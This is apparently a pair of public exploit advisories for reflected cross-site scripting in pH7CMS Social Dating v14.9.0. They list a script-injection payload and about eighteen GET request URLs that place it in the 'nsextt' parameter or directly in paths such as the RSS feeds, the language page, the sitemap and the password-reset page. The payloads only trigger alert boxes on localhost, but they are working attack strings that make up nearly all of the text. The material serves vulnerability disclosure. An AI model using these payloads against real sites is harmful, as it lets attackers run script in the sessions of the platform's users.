===========================================================================================
# Exploit Title: PH7CMS Social Dating 'nsextt' XSS Inj.
# Dork: N/A
# Date: 11-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://ph7cms.com/
# Software Link: https://sourceforge.net/projects/ph7socialdating/files/
# Version: v14.9.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: pH7CMS is a Professional, Free & Open Source PHP Social Dating Builder
Software (primarily designed for Webmasters and Developers ...).
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : '"--></style></scRipt><scRipt>alert(0x000CCB)</scRipt>
# GET Method : http://localhost/pH7Builder1490/?l=en_US&nsextt='"--></style></scRipt><scRipt>alert(0x000CCB)</scRipt>
# GET Method : http://localhost/pH7Builder1490/?nsextt='"--></style></scRipt><scRipt>alert(0x0000A8)</scRipt>
# GET Method : http://localhost/pH7Builder1490/lang/?nsextt='"--></style></scRipt><scRipt>alert(0x0007AD)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/blog?nsextt='"--></style></scRipt><scRipt>alert(0x001216)</scRipt>
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: PH7CMS Social Dating Multiple XSS Inj.
# Dork: N/A
# Date: 11-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://ph7cms.com/
# Software Link: https://sourceforge.net/projects/ph7socialdating/files/
# Version: v14.9.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: pH7CMS is a Professional, Free & Open Source PHP Social Dating Builder
Software (primarily designed for Webmasters and Developers ...).
===========================================================================================
# POC - XSS
# Parameters : Full URL
# Attack Pattern : '"--></style></scRipt><scRipt>alert(0x000CCB)</scRipt>
# GET Method : http://localhost/pH7Builder1490/lang/'"--></style></scRipt><scRipt>alert(0x000A37)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/'"--></style></scRipt><scRipt>alert(0x001228)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/blog'"--></style></scRipt><scRipt>alert(0x001220)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/comment-note'"--></style></scRipt><scRipt>alert(0x00132F)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/comment-profile'"--></style></scRipt><scRipt>alert(0x0012B8)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/forum-topic'"--></style></scRipt><scRipt>alert(0x0012B9)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/note'"--></style></scRipt><scRipt>alert(0x0012B1)</scRipt>
# GET Method : http://localhost/pH7Builder1490/site-map-xml/'"--></style></scRipt><scRipt>alert(0x00121D)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/comment-blog'"--></style></scRipt><scRipt>alert(0x001330)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/comment-video'"--></style></scRipt><scRipt>alert(0x001539)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/comment-picture'"--></style></scRipt><scRipt>alert(0x001615)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/comment-game'"--></style></scRipt><scRipt>alert(0x00161A)</scRipt>
# GET Method : http://localhost/pH7Builder1490/forgot/'"--></style></scRipt><scRipt>alert(0x001701)</scRipt>
===========================================================================================
